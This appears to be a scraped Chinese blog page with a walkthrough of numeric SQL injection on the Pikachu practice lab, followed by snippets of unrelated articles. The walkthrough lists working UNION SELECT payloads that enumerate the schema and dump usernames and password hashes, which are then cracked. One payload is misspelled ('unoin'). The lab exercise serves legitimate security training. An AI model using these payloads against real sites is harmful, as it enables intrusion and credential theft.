news 2026/5/29 22:34:14

皮卡丘靶场实战--数字型sql注入

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
皮卡丘靶场实战--数字型sql注入

题目

上图可以看出所在url没有变化,猜测是GET请求方法

1.使用burpsuite进行抓包

在第10行可以看出数据的提交方式,将数据发送到重放器中

(1)确定字段数 id=1 order by [1,2,3....]

依次测试,验证数据库的字段数,可知字段数为2

(2)按照库->表->列的顺序,依次爆破

id=-1 union select 1,database() 发现库的名字是pikachu

输入id=-1 union select 1,table_name from information_schema.tables where table_schema='pikachu' ,存在名为users的表格

输入id=-1 union select 1,column_name from information_schema.columns where table_name='users 找到对应的列名

(3)最后根据得到的信息进行爆破即可

id=-1 unoin select username,password from users

将得到的密码进行MD5解码,得到123456,000000,abc123

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/5/28 20:51:33

搜索引擎排序算法:TensorFlow Learning to Rank

搜索引擎排序算法:TensorFlow Learning to Rank 在当今信息过载的时代,用户对搜索结果的期望早已不再是“找到匹配关键词的网页”,而是“立刻看到最相关、最有价值的内容”。无论是电商网站的商品列表,还是新闻平台的信息流&#…

作者头像 李华
网站建设 2026/5/29 22:18:23

BunkerWeb终极迁移指南:5个步骤让Nginx配置安全升级

还在为Nginx复杂的安全配置头疼吗?想要一键开启企业级防护却不知从何下手?BunkerWeb作为基于Nginx的安全增强解决方案,通过"默认安全"设计理念,让Web服务防护变得简单高效。本文将从实际应用场景出发,为您提…

作者头像 李华
网站建设 2026/5/28 18:14:50

终极Kubernetes Python客户端完整指南:从零基础到生产级应用

终极Kubernetes Python客户端完整指南:从零基础到生产级应用 【免费下载链接】python 项目地址: https://gitcode.com/gh_mirrors/cl/client-python 想要通过Python代码轻松管理Kubernetes集群吗?Kubernetes Python客户端是官方提供的强大工具库…

作者头像 李华
网站建设 2026/5/28 20:09:35

疫苗接种管理系统大纲

摘要部分是对本文研究内容的简要概述。本文旨在探讨基于MVC模式、Vue框架和MySQL数据库的疫苗接种管理系统的设计与实现。通过对系统背景、意义、国内外研究现状的阐述,明确了研究的重要性和紧迫性。摘要还简要介绍了系统的功能需求、设计思路、实现方法及测试结论&…

作者头像 李华
网站建设 2026/5/29 21:38:43

知识图谱嵌入:TensorFlow TransE模型实现

知识图谱嵌入:TensorFlow TransE模型实现 在智能搜索、推荐系统和自动化问答日益普及的今天,如何让机器真正“理解”知识,而不仅仅是匹配关键词,已成为人工智能落地的核心挑战。知识图谱作为结构化语义知识的重要载体,…

作者头像 李华
网站建设 2026/5/29 2:40:21

DeepSeek-VL2学术解析工具:5大突破性功能重塑科研工作流

DeepSeek-VL2学术解析工具:5大突破性功能重塑科研工作流 【免费下载链接】deepseek-vl2 探索视觉与语言融合新境界的DeepSeek-VL2,以其先进的Mixture-of-Experts架构,实现图像理解与文本生成的飞跃,适用于视觉问答、文档解析等多场…

作者头像 李华